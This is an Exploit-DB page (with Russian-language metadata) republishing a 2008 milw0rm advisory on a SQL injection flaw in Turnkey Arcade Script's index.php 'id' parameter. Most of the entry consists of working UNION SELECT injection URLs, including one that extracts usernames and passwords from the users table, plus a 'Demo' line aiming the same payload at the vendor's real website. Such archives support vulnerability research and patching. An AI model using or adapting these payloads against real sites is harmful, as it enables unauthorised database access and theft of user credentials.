- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7256
- Проверка EDB
-
- Пройдено
- Автор
- THE_5P3CTRUM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-3973 cve-2008-5629
- Дата публикации
- 2008-11-27
Код:
----------------Mor0ccan Nightmares----------------
------------------------------
Script: Turnkey Arcade Script-
------------------------------
-----------------------------------
Site: http://www.turnkeyarcade.com-
-----------------------------------
-----------------------------------------------------------
Author: The_5p3ctrum <[email protected]> <[email protected]>-
-----------------------------------------------------------
-----------------------------------------------------------------------
Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-
-----------------------------------------------------------------------
---
Ex:
---
http://localhost/index.php?action=play&id=[sql]
http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users
--------
exploit:
--------
http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users
-----
Demo:
-----
http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users
-------
Greetz:
-------
Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...
# milw0rm.com [2008-11-27]- Источник
- www.exploit-db.com
